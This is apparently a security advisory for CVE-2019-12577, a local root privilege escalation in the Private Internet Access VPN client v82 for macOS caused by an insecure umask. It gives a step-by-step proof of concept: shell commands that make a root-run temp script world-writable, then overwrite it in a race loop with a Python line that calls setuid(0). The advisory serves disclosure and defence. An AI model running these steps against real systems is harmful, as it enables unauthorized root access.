ASA-2019-00383 – London Trust Media Private Internet Access: Insecure umask

Posted on by Allele Security Intelligence in Alerts

Allele Security Alert

ASA-2019-00383

Identifier(s)

ASA-2019-00383, CVE-2019-12577

Title

Insecure umask

Vendor(s)

London Trust Media

Product(s)

Private Internet Access (PIA) VPN Client

Affected version(s)

Private Internet Access (PIA) VPN Client for macOS v82

Fixed version(s)

Private Internet Access (PIA) VPN Client for macOS v1.2.1 or later

Proof of concept

Yes

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for macOS could allow an authenticated, local attacker to run arbitrary code with elevated privileges.

Technical details

The PIA macOS binary openvpn_launcher.64 is setuid root. This binary creates /tmp/pia_upscript.sh when executed. Because the file creation mask(umask) is not reset, the umask value is inherited from the calling process. This value can be manipulated to cause the privileged binary to create files with world writable permissions. A local unprivileged user can modify /tmp/pia_upscript.sh during the connect process to execute arbitrary code as the root user.

All steps are executed as a low privileged user.

Step 1 – set umask to 0000.

umask 0000

Step 2 – Verify the mask is 0000.

umask

Step 3 – Execute openvpn_launcher.64. This will create /tmp/pia_upscript.sh with permissions of 777

# macOS
/Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher 2>/dv/null

Step 4 – Verify /tmp/pia_upscript.sh is word writable

ls -ld /tmp/pia_upscript.sh

Step 5 – Create a copy of /tmp/pia_upscript.sh.

cp /tmp/pia_upscript.sh /tmp/pia_upscript.sh.woot

Step 6 – Insert arbitrary code in /tmp/pia_upscript.sh.woot.

For this PoC we will execute the id command and pipe the output to wall. This will display the uid/gid via a system broadcast message.

# Add this line to line #2 of the /tmp/pia_upscript.sh.woot.
python -c 'import os;os.setuid(0);os.system("id|wall");’

Step 7 – Beat the race condition by continuously overwriting /tmp/pia_upscript.sh. Put the job in the background. This is required because during the connection process the script will be overwritten.

cd /tmp
while true; do cp pia_upscript.sh.woot pia_upscript.sh;done &

Step 8 – Execute run.sh to open the PIA GUI client

/Applications/Private\ Internet\ Access.app/Contents/MacOS/run.sh

Step 9 – Login and connect to the VPN

During the connection process /tmp/pia_upscript.sh will be executed as root and you should see a wall message showing the output of id command with uid=0.

Credits

Rich Mirch

Reference(s)

PIA macOS Privilege Escalation: Insecure umask
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12577.txt

CVE-2019-12577
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12577

CVE-2019-12577
https://nvd.nist.gov/vuln/detail/CVE-2019-12577

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: June 25, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.